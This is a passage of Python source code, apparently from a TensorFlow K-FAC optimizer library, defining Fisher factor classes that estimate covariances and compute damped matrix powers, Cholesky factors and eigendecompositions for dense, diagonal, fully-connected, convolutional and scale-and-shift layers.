for (exp, damping_id) in self._matpower_registrations:
exp_string = scalar_or_tensor_to_string(exp)
damping_func = self._damping_funcs_by_id[damping_id]
damping_string = graph_func_to_string(damping_func)
with tf.variable_scope(self._var_scope):
matpower = tf.get_variable(
"matpower_exp{}_damp{}".format(exp_string, damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
assert (exp, damping_id) not in self._matpower_by_exp_and_damping
self._matpower_by_exp_and_damping[(exp, damping_id)] = matpower
for damping_id in self._cholesky_registrations:
damping_func = self._damping_funcs_by_id[damping_id]
damping_string = graph_func_to_string(damping_func)
with tf.variable_scope(self._var_scope):
chol = tf.get_variable(
"cholesky_damp{}".format(damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
assert damping_id not in self._cholesky_by_damping
self._cholesky_by_damping[damping_id] = chol
for damping_id in self._cholesky_inverse_registrations:
damping_func = self._damping_funcs_by_id[damping_id]
damping_string = graph_func_to_string(damping_func)
with tf.variable_scope(self._var_scope):
cholinv = tf.get_variable(
"cholesky_inverse_damp{}".format(damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
assert damping_id not in self._cholesky_inverse_by_damping
self._cholesky_inverse_by_damping[damping_id] = cholinv
def make_inverse_update_ops(self):
"""Create and return update ops corresponding to registered computations."""
ops = []
num_inverses = sum(1 for (exp, _) in self._matpower_by_exp_and_damping
if exp == -1)
num_other_matpower = len(self._matpower_by_exp_and_damping) - num_inverses
other_matrix_power_registered = num_other_matpower >= 1
use_eig = (
self._eigendecomp or other_matrix_power_registered or
num_inverses >= EIGENVALUE_DECOMPOSITION_THRESHOLD)
# We precompute these so we don't need to evaluate them multiple times (for
# each matrix power that uses them)
damping_value_by_id = {damping_id: tf.cast(
self._damping_funcs_by_id[damping_id](), self._dtype)
for damping_id in self._damping_funcs_by_id}
if use_eig:
eigenvalues, eigenvectors = self.get_eigendecomp() # pylint: disable=unpacking-non-sequence
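# (The loop below forms each registered matrix power as
# eigenvectors * diag(eigenvalues + damping)**exp * eigenvectors^T, reusing a
# single eigendecomposition of cov for all of them.)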
for (exp, damping_id), matpower in (
self._matpower_by_exp_and_damping.items()):
damping = damping_value_by_id[damping_id]
ops.append(
utils.smart_assign(
matpower,
tf.matmul(eigenvectors * (eigenvalues + damping)**exp,
tf.transpose(eigenvectors))))
# These ops share computation and should be run on a single device.
ops = [tf.group(*ops)]
else:
for (exp, damping_id), matpower in (
self._matpower_by_exp_and_damping.items()):
assert exp == -1
damping = damping_value_by_id[damping_id]
ops.append(
utils.smart_assign(matpower, utils.posdef_inv(self.cov, damping)))
# TODO(b/77902055): If inverses are being computed with Cholesky's
# we can share the work. Instead this code currently just computes the
# Cholesky a second time. It does at least share work between requests for
# Cholesky's and Cholesky inverses with the same damping id.
for damping_id, cholesky_inv in self._cholesky_inverse_by_damping.items():
cholesky_ops = []
damping = damping_value_by_id[damping_id]
cholesky_value = utils.cholesky(self.cov, damping)
if damping_id in self._cholesky_by_damping:
cholesky = self._cholesky_by_damping[damping_id]
cholesky_ops.append(utils.smart_assign(cholesky, cholesky_value))
identity = tf.eye(
cholesky_value.shape.as_list()[0], dtype=cholesky_value.dtype)
cholesky_inv_value = tf.matrix_triangular_solve(cholesky_value, identity)
cholesky_ops.append(utils.smart_assign(cholesky_inv, cholesky_inv_value))
ops.append(tf.group(*cholesky_ops))
for damping_id, cholesky in self._cholesky_by_damping.items():
if damping_id not in self._cholesky_inverse_by_damping:
damping = damping_value_by_id[damping_id]
cholesky_value = utils.cholesky(self.cov, damping)
ops.append(utils.smart_assign(cholesky, cholesky_value))
self._eigendecomp = False
return ops
def get_inverse(self, damping_func):
# Just for backwards compatibility of some old code and tests
return self.get_matpower(-1, damping_func)
def get_matpower(self, exp, damping_func):
# Note that this function returns a variable which gets updated by the
# inverse ops. It may be stale / inconsistent with the latest value of
# self.cov (except when exp == 1).
if exp != 1:
damping_id = graph_func_to_id(damping_func)
matpower = self._matpower_by_exp_and_damping[(exp, damping_id)]
else:
cov = self.cov
identity = tf.eye(cov.shape.as_list()[0], dtype=cov.dtype)
matpower = cov + tf.cast(damping_func(), dtype=self.cov.dtype)*identity
assert matpower.shape.ndims == 2
return lo.LinearOperatorFullMatrix(matpower,
is_non_singular=True,
is_self_adjoint=True,
is_positive_definite=True,
is_square=True)
def get_cholesky(self, damping_func):
# Note that this function returns a variable which gets updated by the
# inverse ops. It may be stale / inconsistent with the latest value of
# self.cov.
damping_id = graph_func_to_id(damping_func)
cholesky = self._cholesky_by_damping[damping_id]
assert cholesky.shape.ndims == 2
return lo.LinearOperatorFullMatrix(cholesky,
is_non_singular=True,
is_square=True)
def get_cholesky_inverse(self, damping_func):
# Note that this function returns a variable which gets updated by the
# inverse ops. It may be stale / inconsistent with the latest value of
# self.cov.
damping_id = graph_func_to_id(damping_func)
cholesky_inv = self._cholesky_inverse_by_damping[damping_id]
assert cholesky_inv.shape.ndims == 2
return lo.LinearOperatorFullMatrix(cholesky_inv,
is_non_singular=True,
is_square=True)
def get_eigendecomp(self):
"""Creates or retrieves eigendecomposition of self._cov."""
# Unlike get_matpower this doesn't retrieve a stored variable, but instead
# always computes a fresh version from the current value of self.cov.
if not self._eigendecomp:
eigenvalues, eigenvectors = tf.self_adjoint_eig(self.cov)
# The matrix self._cov is positive semidefinite by construction, but the
# numerical eigenvalues could be negative due to numerical errors, so here
# we clip them to be at least FLAGS.eigenvalue_clipping_threshold
clipped_eigenvalues = tf.maximum(eigenvalues,
EIGENVALUE_CLIPPING_THRESHOLD)
self._eigendecomp = (clipped_eigenvalues, eigenvectors)
return self._eigendecomp
class NaiveFullFactor(DenseSquareMatrixFactor):
"""FisherFactor for a full matrix representation of the Fisher of a parameter.
Note that this uses the naive "square the sum estimator", and so is applicable
to any type of parameter in principle, but has very high variance.
"""
def __init__(self,
params_grads,
batch_size):
self._batch_size = batch_size
self._params_grads = tuple(utils.ensure_sequence(params_grad)
for params_grad in params_grads)
super(NaiveFullFactor, self).__init__()
@property
def _var_scope(self):
return "ff_naivefull_" + scope_string_from_params(
[self._params_grads, self._batch_size])
@property
def _cov_shape(self):
size = sum(param_grad.shape.num_elements()
for param_grad in self._params_grads[0])
return (size, size)
@property
def _num_sources(self):
return len(self._params_grads)
@property
def _num_towers(self):
return 1
@property
def _dtype(self):
return self._params_grads[0][0].dtype
def _partial_batch_size(self, source=0, tower=0):
assert source == 0 and tower == 0
return self._batch_size
def _compute_new_cov(self, source, tower):
assert tower == 0
# This will be a very basic rank 1 estimate
params_grads_flat = utils.tensors_to_column(self._params_grads[source])
return ((params_grads_flat * tf.transpose(params_grads_flat)) / tf.cast(
self._batch_size, params_grads_flat.dtype))
def _get_data_device(self, tower):
return None
@six.add_metaclass(abc.ABCMeta)
class DiagonalFactor(FisherFactor):
"""A base class for FisherFactors that use diagonal approximations.
A DiagonalFactor's covariance variable can be of any shape, but must contain
exactly one entry per parameter.
"""
def get_cov_as_linear_operator(self):
"""Returns `LinearOperator` instance which wraps the cov matrix."""
return lo.LinearOperatorDiag(self._matrix_diagonal,
is_self_adjoint=True,
is_square=True)
@property
def _cov_initializer(self):
return diagonal_covariance_initializer
@property
def _matrix_diagonal(self):
return tf.reshape(self.cov, [-1])
def make_inverse_update_ops(self):
return []
def instantiate_inv_variables(self):
pass
def register_matpower(self, exp, damping_func):
pass
def register_cholesky(self, damping_func):
pass
def register_cholesky_inverse(self, damping_func):
pass
def get_matpower(self, exp, damping_func):
matpower_diagonal = (self._matrix_diagonal
+ tf.cast(damping_func(), self._dtype))**exp
return lo.LinearOperatorDiag(matpower_diagonal,
is_non_singular=True,
is_self_adjoint=True,
is_positive_definite=True,
is_square=True)
def get_cholesky(self, damping_func):
return self.get_matpower(0.5, damping_func)
def get_cholesky_inverse(self, damping_func):
return self.get_matpower(-0.5, damping_func)
class NaiveDiagonalFactor(DiagonalFactor):
"""FisherFactor for a diagonal approximation of any type of param's Fisher.
Note that this uses the naive "square the sum estimator", and so is applicable
to any type of parameter in principle, but has very high variance.
"""
def __init__(self,
params_grads,
batch_size):
"""Initializes NaiveDiagonalFactor instance.
Args:
params_grads: Sequence of Tensors, each with same shape as parameters this
FisherFactor corresponds to. For example, the gradient of the loss with
respect to parameters.
batch_size: int or 0-D Tensor. Size of the minibatch.
"""
self._params_grads = tuple(utils.ensure_sequence(params_grad)
for params_grad in params_grads)
self._batch_size = batch_size
super(NaiveDiagonalFactor, self).__init__()
@property
def _var_scope(self):
return "ff_naivediag_" + scope_string_from_params(
[self._params_grads, self._batch_size])
@property
def _cov_shape(self):
size = sum(param_grad.shape.num_elements()
for param_grad in self._params_grads[0])
return [size, 1]
@property
def _num_sources(self):
return len(self._params_grads)
@property
def _num_towers(self):
return 1
@property
def _dtype(self):
return self._params_grads[0][0].dtype
def _partial_batch_size(self, source=0, tower=0):
assert source == 0 and tower == 0
return self._batch_size
def _compute_new_cov(self, source, tower):
assert tower == 0
params_grads_flat = utils.tensors_to_column(self._params_grads[source])
return (tf.square(params_grads_flat) / tf.cast(
self._batch_size, params_grads_flat.dtype))
def _get_data_device(self, tower):
return None
class DiagonalKroneckerFactor(DiagonalFactor):
"""A Kronecker FisherFactor using diagonal approximations.
This class handles both sparse and dense inputs. The covariance is estimated
using the diagonal covariance matrix. For a dense tensor:
Cov(inputs, inputs) = (1/batch_size) sum_{i} diag(inputs[i,:] ** 2).
For sparse inputs, one of the most common use cases is the sparse input to an
embedding layer. Given tensor = [batch_size, input_size] representing
indices into a [vocab_size, embedding_size] embedding matrix, the diagonal
covariance matrix is
Cov(inputs, inputs) =
(1/batch_size) sum_{i} diag(n_hot(inputs[i]) ** 2).
where inputs[i] is the ith list of input ids, n_hot() constructs an n-hot
binary vector and diag() constructs a diagonal matrix of size
[vocab_size, vocab_size].
"""
def __init__(self, tensors, has_bias=False, dtype=None):
"""Instantiate DiagonalKroneckerFactor.
Args:
tensors: List of list of Tensors, each of shape [batch_size, n]. First
index is source, second index is tower. Two types of tensors are
supported. Dense tensors are typically either a layer's inputs or its
output's gradients. Sparse tensors are typically indices into a
[vocab_size, embedding_dim] embedding matrix. Sparse tensors must have
a property named "one_hot_depth" indicating the depth of the one-hot tensors
they should be converted to.
has_bias: bool. If True, append '1' to each input.
dtype: dtype for covariance statistics. Only used for sparse inputs. Must
be a floating point type. Defaults to float32.
"""
self._tensors = tensors
dtype = dtype or tf.float32
self._has_bias = has_bias
self._one_hot_depth = getattr(self._tensors[0][0], "one_hot_depth", None)
if self._one_hot_depth is None:
self._dense_input = True
self._cov_dtype = self._tensors[0][0].dtype
else:
self._dense_input = False
self._cov_dtype = dtype
super(DiagonalKroneckerFactor, self).__init__()
@property
def _var_scope(self):
return "ff_diag_kron_" + scope_string_from_params(
nest.flatten(self._tensors))
@property
def _cov_shape(self):
if self._dense_input:
size = self._tensors[0][0].shape[1] + self._has_bias
else:
size = self._one_hot_depth + self._has_bias
return [size]
@property
def _num_sources(self):
return len(self._tensors)
@property
def _num_towers(self):
return len(self._tensors[0])
@property
def _dtype(self):
return self._cov_dtype
def _partial_batch_size(self, source=0, tower=0):
return utils.get_shape(self._tensors[source][tower])[0]
def _compute_new_cov(self, source, tower):
tensor = self._tensors[source][tower]
if len(tensor.shape) > 2:
raise ValueError(
"Input tensors to DiagonalKroneckerFactor must have rank <= 2. "
"Found tensor with wrong rank: {}".format(tensor))
batch_size = utils.get_shape(tensor)[0]
if self._dense_input:
new_cov = tf.square(tensor)
else:
# Transform indices into one-hot vectors.
#
# TODO(b/72714822): There must be a faster way to construct the diagonal
# covariance matrix! This operation is O(batch_size * vocab_size), where
# it should be O(batch_size * input_size).
flat_input_ids = tf.reshape(tensor, [-1])
new_cov = tf.one_hot(flat_input_ids,
self._one_hot_depth) # [?, vocab_size]
# Take average across examples. Note that, because all entries have
# magnitude zero or one, there's no need to square the entries.
#
# TODO(b/72714822): Support for SparseTensor, other kinds of aggregation
# within an example such as average.
#
# TODO(b/72714822): Support for partitioned embeddings.
new_cov = tf.reduce_sum(new_cov, axis=0)
new_cov /= tf.cast(batch_size, new_cov.dtype)
if self._has_bias:
new_cov = append_homog(new_cov)
return new_cov
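# Illustrative example (hypothetical numbers): for a single sparse example
# with ids [2, 5] and one_hot_depth = 8, the two one-hot rows sum to a vector
# with 1.0 at indices 2 and 5 and 0.0 elsewhere; dividing by the batch size
# gives that example's contribution to the diagonal covariance.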
def _get_data_device(self, tower):
return self._tensors[0][tower].device
class DiagonalMultiKF(DiagonalKroneckerFactor):
def __init__(self, tensors, num_uses, has_bias=False, dtype=None):
super(DiagonalMultiKF, self).__init__(
tensors, dtype=dtype, has_bias=has_bias)
self._num_uses = num_uses
def _partial_batch_size(self, source=0, tower=0):
# Note that some internal computations of "batch_size" done in the parent
# class won't actually be the proper batch size. Instead, they will be
# just "the thing to normalize the statistics by", essentially. This is okay
# as we don't mix the two things up.
return (super(DiagonalMultiKF, self)._partial_batch_size(source=source,
tower=tower)
// self._num_uses)
class FullyConnectedDiagonalFactor(DiagonalFactor):
r"""FisherFactor for a diagonal approx of a fully-connected layer's Fisher.
Given in = [batch_size, input_size] and out_grad = [batch_size, output_size],
approximates the covariance as,
Cov(in, out) = (1/batch_size) sum_{i} outer(in[i], out_grad[i]) ** 2.0
where the square is taken element-wise.
"""
def __init__(self,
inputs,
outputs_grads,
has_bias=False):
"""Instantiate FullyConnectedDiagonalFactor.
Args:
inputs: List of Tensors of shape [batch_size, input_size]. Inputs to this
layer. List index is towers.
outputs_grads: List of Tensors, each of shape [batch_size, output_size],
which are the gradients of the loss with respect to the layer's
outputs. First index is source, second is tower.
has_bias: bool. If True, append '1' to each input.
"""
self._inputs = inputs
self._has_bias = has_bias
self._outputs_grads = outputs_grads
self._squared_inputs = None
super(FullyConnectedDiagonalFactor, self).__init__()
@property
def _var_scope(self):
return "ff_diagfc_" + scope_string_from_params(
tuple(self._inputs) + tuple(nest.flatten(self._outputs_grads)))
@property
def _cov_shape(self):
input_size = self._inputs[0].shape[1] + self._has_bias
output_size = self._outputs_grads[0][0].shape[1]
return [input_size, output_size]
@property
def _num_sources(self):
return len(self._outputs_grads)
@property
def _num_towers(self):
return len(self._inputs)
@property
def _dtype(self):
return self._outputs_grads[0][0].dtype
def _partial_batch_size(self, source=0, tower=0):
return utils.get_shape(self._outputs_grads[source][tower])[0]
def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True):
self._squared_inputs = []
for tower in range(self._num_towers):
inputs = self._inputs[tower]
with maybe_place_on_device(self._get_data_device(tower)):
if self._has_bias:
inputs = append_homog(inputs)
self._squared_inputs.append(tf.square(inputs))
return super(FullyConnectedDiagonalFactor, self).make_covariance_update_op(
ema_decay, ema_weight, should_write=should_write)
def _compute_new_cov(self, source, tower):
batch_size = utils.get_shape(self._squared_inputs[tower])[0]
outputs_grad = self._outputs_grads[source][tower]
# The well-known special formula that uses the fact that the entry-wise
# square of an outer product is the outer-product of the entry-wise squares.
# The gradient is the outer product of the input and the output gradients,
# so we just square both and then take their outer-product.
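# (Illustrative sketch of the identity used below: for per-example vectors a
# (inputs) and g (output grads), each entry of outer(a, g)**2 equals the
# corresponding entry of outer(a**2, g**2), so summing the squared
# per-example gradients over the batch reduces to a single matmul of the
# squared inputs with the squared output gradients.)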
new_cov = tf.matmul(
self._squared_inputs[tower], tf.square(outputs_grad), transpose_a=True)
new_cov /= tf.cast(batch_size, new_cov.dtype)
return new_cov
def _get_data_device(self, tower):
return self._inputs[tower].device
@six.add_metaclass(abc.ABCMeta)
class ScaleAndShiftFactor(FisherFactor):
def __init__(self,
inputs,
outputs_grads,
broadcast_dim,
has_shift=True,
approx="full"):
assert approx == "full" or approx == "diagonal"
self._inputs = inputs
self._outputs_grads = outputs_grads
self._broadcast_dim = broadcast_dim
self._has_shift = has_shift
self._approx = approx
super(ScaleAndShiftFactor, self).__init__()
@property
def _var_scope(self):
return "ff_scaleshift_" + scope_string_from_params(
[self._inputs, self._outputs_grads, self._broadcast_dim,
self._has_shift, self._approx])
@property
def _cov_shape(self):
size = np.prod(self._inputs[0].shape[self._broadcast_dim:])
if self._has_shift:
size *= 2
if self._approx == "full":
return (size, size)
elif self._approx == "diagonal":
return (size,)
@property
def _num_sources(self):
return len(self._outputs_grads)
@property
def _num_towers(self):
return len(self._inputs)
@property
def _dtype(self):
return self._inputs[0].dtype
def _partial_batch_size(self, source=0, tower=0):
return utils.get_shape(self._outputs_grads[source][tower])[0]
def _compute_new_cov(self, source, tower):
# Here we implement a "sum of squares" estimator that uses the special
# structure of the scale & shift operation. In particular, we sum across
# all dimensions that broadcast, then square (or take outer-products), and
# then average across the mini-batch.
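# (Sketch with hypothetical shapes: for inputs of shape [B, H, W, C],
# broadcast_dim = 3, and a scale/shift parameter of shape [C], the
# per-example scale gradient is the sum over H and W of inputs * outputs_grad,
# giving [B, C]; the shift gradient is the sum over H and W of outputs_grad,
# also [B, C].)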
inputs = self._inputs[tower]
outputs_grad = self._outputs_grads[source][tower]
batch_size = utils.get_shape(inputs)[0]
assert len(inputs.shape) == len(outputs_grad.shape)
for i in range(1, len(inputs.shape)):
assert inputs.shape[i] <= outputs_grad.shape[i]
# The formula for the gradient of the scale param is just the element-wise
# product of the inputs and the output gradients, summed across the
# dimensions that get broadcasted.
scale_grads = tf.reduce_sum(inputs * outputs_grad,
axis=list(range(1, self._broadcast_dim)))
scale_grads_flat = tf.reshape(scale_grads, [batch_size, -1])
if self._has_shift:
# The formula for the gradient of the shift param is just the output
# gradients, summed across the dimensions that get broadcasted.
shift_grads = tf.reduce_sum(outputs_grad,
axis=list(range(1, self._broadcast_dim)))
shift_grads_flat = tf.reshape(shift_grads, [batch_size, -1])
params_grads_flat = tf.concat([scale_grads_flat, shift_grads_flat],
axis=1)
else:
params_grads_flat = scale_grads_flat
if self._approx == "full":
new_cov = compute_cov(params_grads_flat)
elif self._approx == "diagonal":
new_cov = tf.reduce_mean(tf.square(params_grads_flat), axis=0)
return new_cov
def _get_data_device(self, tower):
return self._inputs[tower].device
class ScaleAndShiftFullFactor(ScaleAndShiftFactor, DenseSquareMatrixFactor):
def __init__(self,
inputs,
outputs_grads,
broadcast_dim,
has_shift=True):
super(ScaleAndShiftFullFactor, self).__init__(inputs,
outputs_grads,
broadcast_dim,
has_shift=has_shift,
approx="full")
class ScaleAndShiftDiagonalFactor(ScaleAndShiftFactor, DiagonalFactor):
def __init__(self,
inputs,
outputs_grads,
broadcast_dim,
has_shift=True):
super(ScaleAndShiftDiagonalFactor, self).__init__(inputs,
outputs_grads,
broadcast_dim,
has_shift=has_shift,
approx="diagonal")
class ConvDiagonalFactor(DiagonalFactor):
"""FisherFactor for a diagonal approx of a convolutional layer's Fisher."""
def __init__(self,
inputs,
outputs_grads,
filter_shape,
strides,
padding,
data_format=None,
dilations=None,
has_bias=False,
patch_mask=None):
"""Creates a ConvDiagonalFactor object.
Args:
inputs: List of Tensors of shape [batch_size, height, width, in_channels].
Input activations to this layer. List index is towers.
outputs_grads: List of Tensors, each of shape [batch_size,
height, width, out_channels], which are the gradients of the loss
with respect to the layer's outputs. First index is source, second
index is tower.
filter_shape: Tuple of 4 ints: (kernel_height, kernel_width, in_channels,
out_channels). Represents shape of kernel used in this layer.
strides: The stride size in this layer (1-D Tensor of length 4).
padding: str. The padding method used in this layer ("SAME" or "VALID").
data_format: None or str. Format of conv2d inputs.
dilations: None or tuple of 4 ints.
has_bias: Python bool. If True, the layer is assumed to have a bias
parameter in addition to its filter parameter.
patch_mask: Tensor of shape [kernel_height, kernel_width, in_channels]
or None. If not None this is multiplied against the extracted patches
Tensor (broadcasting along the batch dimension) before statistics are
computed. (Default: None)
Raises:
ValueError: If inputs, output_grads, and filter_shape do not agree on
in_channels or out_channels.
ValueError: If strides, dilations are not length-4 lists of ints.
ValueError: If data_format does not put channel last.
"""
if not utils.is_data_format_channel_last(data_format):
raise ValueError("Channel must be last.")
if any(input_.shape.ndims != 4 for input_ in inputs):
raise ValueError("inputs must be a list of 4-D Tensors.")
if any(input_.shape.as_list()[-1] != filter_shape[-2] for input_ in inputs):
raise ValueError("inputs and filter_shape must agree on in_channels.")
for i, outputs_grad in enumerate(outputs_grads):
if any(output_grad.shape.ndims != 4 for output_grad in outputs_grad):
raise ValueError("outputs[%d] must be 4-D Tensor." % i)
if any(output_grad.shape.as_list()[-1] != filter_shape[-1]
for output_grad in outputs_grad):
raise ValueError(
"outputs[%d] and filter_shape must agree on out_channels." % i)
if len(strides) != 4:
raise ValueError("strides must be length-4 list of ints.")
if dilations is not None and len(dilations) != 4:
raise ValueError("dilations must be length-4 list of ints.")
self._inputs = inputs
self._outputs_grads = outputs_grads
self._filter_shape = filter_shape
self._strides = strides
self._padding = padding
self._data_format = data_format
self._dilations = dilations
self._has_bias = has_bias
self._patches = None
self._patch_mask = patch_mask
super(ConvDiagonalFactor, self).__init__()
@property
def _var_scope(self):
return "ff_convdiag_" + scope_string_from_params(
tuple(self._inputs) + tuple(nest.flatten(self._outputs_grads)))
@property
def _cov_shape(self):
filter_height, filter_width, in_channels, out_channels = self._filter_shape
return [
filter_height * filter_width * in_channels + self._has_bias,
out_channels
]
@property
def _num_sources(self):
return len(self._outputs_grads)
@property
def _num_towers(self):
return len(self._inputs)
@property
def _dtype(self):
return self._inputs[0].dtype
def _partial_batch_size(self, source=0, tower=0):
return utils.get_shape(self._outputs_grads[source][tower])[0]
def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True):
filter_height, filter_width, _, _ = self._filter_shape
# TODO(b/64144716): there is potential here for a big savings in terms
# of memory use.
if self._dilations is None:
rates = (1, 1, 1, 1)
else:
rates = tuple(self._dilations)
self._patches = []
for tower in range(self._num_towers):
with maybe_place_on_device(self._get_data_device(tower)):
patches = tf.extract_image_patches(
self._inputs[tower],
ksizes=[1, filter_height, filter_width, 1],
strides=self._strides,
rates=rates,
padding=self._padding)
if self._patch_mask is not None:
assert self._patch_mask.shape == self._filter_shape[0:-1]
# This should work as intended due to broadcasting.
patches *= self._patch_mask
if self._has_bias:
patches = append_homog(patches)
self._patches.append(patches)
return super(ConvDiagonalFactor, self).make_covariance_update_op(
ema_decay, ema_weight, should_write=should_write)
def _compute_new_cov(self, source, tower):
patches = self._patches[tower]
batch_size = utils.get_shape(patches)[0]
outputs_grad = self._outputs_grads[source][tower]
new_cov = self._convdiag_sum_of_squares(patches, outputs_grad)
new_cov /= tf.cast(batch_size, new_cov.dtype)
return new_cov
def _convdiag_sum_of_squares(self, patches, outputs_grad):
# This computes the sum of the squares of the per-training-case "gradients".
# It does this simply by computing a giant tensor containing all of these,
# doing an entry-wise square, and then summing along the batch dimension.
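# (Illustrative shapes: patches is [batch, out_h, out_w, k*k*in_channels]
# (plus one if the layer has a bias) and outputs_grad is
# [batch, out_h, out_w, out_channels]; the einsum sums over the spatial
# locations, giving per-example gradients of shape
# [batch, k*k*in_channels, out_channels].)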
case_wise_gradients = tf.einsum("bijk,bijl->bkl", patches, outputs_grad)
return tf.reduce_sum(tf.square(case_wise_gradients), axis=0)
def _get_data_device(self, tower):
return self._inputs[tower].device
class FullyConnectedKroneckerFactor(DenseSquareMatrixFactor):
"""Kronecker factor for the input or output side of a fully-connected layer.
"""
def __init__(self,
tensors,
has_bias=False):
"""Instantiate FullyConnectedKroneckerFactor.
Args:
tensors: List of list of Tensors, each of shape [batch_size, n]. The
Tensors are typically either a layer's inputs or its output's gradients.
The first list index is source, the second is tower.
has_bias: bool. If True, append '1' to each row.
"""
# The tensor argument is either a tensor of input activations or a tensor of
# output pre-activation gradients.
self._has_bias = has_bias
self._tensors = tensors
super(FullyConnectedKroneckerFactor, self).__init__()
@property
def _var_scope(self):
return "ff_fckron_" + scope_string_from_params(
tuple(nest.flatten(self._tensors)) + (self._has_bias,))
@property
def _cov_shape(self):
size = self._tensors[0][0].shape[1] + self._has_bias
return [size, size]
@property
def _num_sources(self):
return len(self._tensors)
@property
def _num_towers(self):
return len(self._tensors[0])
@property
def _dtype(self):
return self._tensors[0][0].dtype
def _partial_batch_size(self, source=0, tower=0):
return utils.get_shape(self._tensors[source][tower])[0]
def _compute_new_cov(self, source, tower):
tensor = self._tensors[source][tower]
if self._has_bias:
tensor = append_homog(tensor)
return compute_cov(tensor)
def _get_data_device(self, tower):
return self._tensors[0][tower].device
class ConvInputKroneckerFactor(DenseSquareMatrixFactor):
r"""Kronecker factor for the input side of a convolutional layer.
Estimates E[ a a^T ] where a is the inputs to a convolutional layer given
example x. Expectation is taken over all examples and locations.
Equivalent to Omega in https://arxiv.org/abs/1602.01407. See Section 3.1
"Estimating the factors" for details.
"""
def __init__(self,
inputs,
filter_shape,
padding,
strides=None,
dilation_rate=None,
data_format=None,
extract_patches_fn=None,
has_bias=False,
sub_sample_inputs=None,
sub_sample_patches=None,
patch_mask=None):
"""Initializes ConvInputKroneckerFactor.
Args:
inputs: List of Tensors of shape [batch_size, ..spatial_input_size..,
in_channels]. Inputs to layer. List index is tower.
filter_shape: List of ints. Contains [..spatial_filter_size..,
in_channels, out_channels]. Shape of convolution kernel.
padding: str. Padding method for layer. "SAME" or "VALID".
strides: List of ints or None. Contains [..spatial_filter_strides..] if
'extract_patches_fn' is compatible with tf.nn.convolution(), else
[1, ..spatial_filter_strides, 1].
dilation_rate: List of ints or None. Rate for dilation along each spatial
dimension if 'extract_patches_fn' is compatible with
tf.nn.convolution(), else [1, ..spatial_dilation_rates.., 1].
data_format: str or None. Format of input data.
extract_patches_fn: str or None. Name of function that extracts image
patches. One of "extract_convolution_patches", "extract_image_patches",
"extract_pointwise_conv2d_patches".
has_bias: bool. If True, append 1 to in_channel.
sub_sample_inputs: `bool`. If True, then subsample the inputs from which
the image patches are extracted. (Default: None)
sub_sample_patches: `bool`, If `True` then subsample the extracted
patches. (Default: None)
patch_mask: Tensor of shape [kernel_height, kernel_width, in_channels]
or None. If not None this is multiplied against the extracted patches
Tensor (broadcasting along the batch dimension) before statistics are
computed. (Default: None)
"""
self._inputs = inputs
self._filter_shape = filter_shape
self._strides = strides
self._padding = padding
self._dilation_rate = dilation_rate
self._data_format = data_format
self._extract_patches_fn = extract_patches_fn
self._has_bias = has_bias
if sub_sample_inputs is None:
self._sub_sample_inputs = _SUB_SAMPLE_INPUTS
else:
self._sub_sample_inputs = sub_sample_inputs
if sub_sample_patches is None:
self._sub_sample_patches = _SUB_SAMPLE_PATCHES
else:
self._sub_sample_patches = sub_sample_patches
self._patch_mask = patch_mask
super(ConvInputKroneckerFactor, self).__init__()
@property
def _var_scope(self):
return "ff_convinkron_" + scope_string_from_params(
tuple(self._inputs) +
tuple((self._filter_shape, self._strides, self._padding,
self._dilation_rate, self._data_format, self._has_bias,
self._patch_mask)))
@property
def _cov_shape(self):
spatial_filter_shape = self._filter_shape[0:-2]
in_channels = self._filter_shape[-2]
size = np.prod(spatial_filter_shape) * in_channels + self._has_bias
return [size, size]
@property
def _num_sources(self):
return 1
@property
def _num_towers(self):
return len(self._inputs)
@property
def _dtype(self):
return self._inputs[0].dtype
def _partial_batch_size(self, source=0, tower=0):
assert source == 0
return utils.get_shape(self._inputs[tower])[0]
def _compute_new_cov(self, source, tower):
assert source == 0
inputs = self._inputs[tower]
if self._sub_sample_inputs:
batch_size = utils.get_shape(inputs)[0]
# computes: int(math.ceil(batch_size * _INPUTS_TO_EXTRACT_PATCHES_FACTOR))
new_size = tf.cast(
tf.ceil(tf.multiply(tf.cast(batch_size, dtype=tf.float32),
_INPUTS_TO_EXTRACT_PATCHES_FACTOR)),
dtype=tf.int32)
inputs = _random_tensor_gather(inputs, new_size)
# TODO(b/64144716): there is potential here for a big savings in terms of
# memory use.
if self._extract_patches_fn in [None, "extract_convolution_patches"]:
patches = utils.extract_convolution_patches(
inputs,
self._filter_shape,
padding=self._padding,
strides=self._strides,
dilation_rate=self._dilation_rate,
data_format=self._data_format)
elif self._extract_patches_fn == "extract_image_patches":
assert inputs.shape.ndims == 4
assert len(self._filter_shape) == 4
assert len(self._strides) == 4, self._strides
if self._dilation_rate is None:
rates = [1, 1, 1, 1]
else:
rates = self._dilation_rate
assert len(rates) == 4
assert rates[0] == rates[-1] == 1
patches = tf.extract_image_patches(
inputs,
ksizes=[1] + list(self._filter_shape[0:-2]) + [1],
strides=self._strides,
rates=rates,
padding=self._padding)
elif self._extract_patches_fn == "extract_pointwise_conv2d_patches":
assert self._strides in [None, [1, 1, 1, 1], (1, 1, 1, 1)]
assert self._filter_shape[0] == self._filter_shape[1] == 1
patches = utils.extract_pointwise_conv2d_patches(
inputs, self._filter_shape, data_format=None)
else:
raise NotImplementedError(self._extract_patches_fn)
if self._patch_mask is not None:
assert self._patch_mask.shape == self._filter_shape[0:-1]
# This should work as intended due to broadcasting.
patches *= tf.reshape(self._patch_mask, [-1])
flatten_size = np.prod(self._filter_shape[0:-1])
# patches_flat below is the matrix [[A_l]] from the KFC paper (tilde
# omitted over A for clarity). It has shape M|T| x J|Delta| (eq. 14),
# where M = minibatch size, |T| = number of spatial locations,
# |Delta| = number of spatial offsets, and J = number of input maps
# for convolutional layer l.
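# (Illustrative numbers: with minibatch size M = 32, a 16x16 output grid so
# |T| = 256, a 3x3 kernel so |Delta| = 9, and J = 64 input maps, patches_flat
# has shape [8192, 576] and the resulting factor is 576 x 576, plus one in
# each dimension if the layer has a bias.)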
patches_flat = tf.reshape(patches, [-1, flatten_size])
if self._sub_sample_patches:
patches_flat = _subsample_patches(patches_flat)
# We append a homogeneous coordinate to patches_flat if the layer has
# bias parameters. This gives us [[A_l]]_H from the paper.
if self._has_bias:
patches_flat = append_homog(patches_flat)
# We call compute_cov without passing in a normalizer. compute_cov uses
